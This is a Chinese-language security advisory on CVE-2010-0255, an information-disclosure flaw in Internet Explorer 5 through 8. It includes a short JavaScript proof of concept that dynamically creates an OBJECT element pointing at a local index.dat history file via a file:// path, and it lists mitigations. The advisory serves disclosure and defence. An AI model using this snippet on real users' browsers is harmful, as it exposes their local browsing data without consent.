Microsoft IE动态OBJECT标签信息泄露漏洞

受影响系统:

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

描述:


BUGTRAQ  ID: 38055
CVE ID: CVE-2010-0255

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

Internet Explorer在加载OBJECT标签中所指定内容时如果index.dat文件直接从类似于以下的网页引用的话,则不会渲染和显示该文件的内容:

/—–
        <object data="file://127.0.0.1/C$/…/index.dat"
                type="text/html"
                width="100%" height="50"
         </object>

– —–/

但如果使用类似于以下的HTML代码就会加载并渲染该文件:

/—–
        <script language="Javascript">
                var obj = document.createElement("object");
                obj.data = "file://127.0.0.1/C$/…/index.dat";
                obj.type = "text/html";
                obj.id = "obj_results";
                obj.width = "500px";
                obj.height = "300px";
                document.body.appendChild(obj);
         </script>

– —–/

<*来源:Federico Muttis
        Jorge Luis Alvarez Medina
  
  链接:http://marc.info/?l=bugtraq&m=126523704719372&w=2
        http://www.microsoft.com/technet/security/advisory/980088.mspx?pf=true
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
* 对Windows XP启用Internet Explorer网络协议锁定。

建议:


厂商补丁:

Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

发表评论?

0 条评论。

发表评论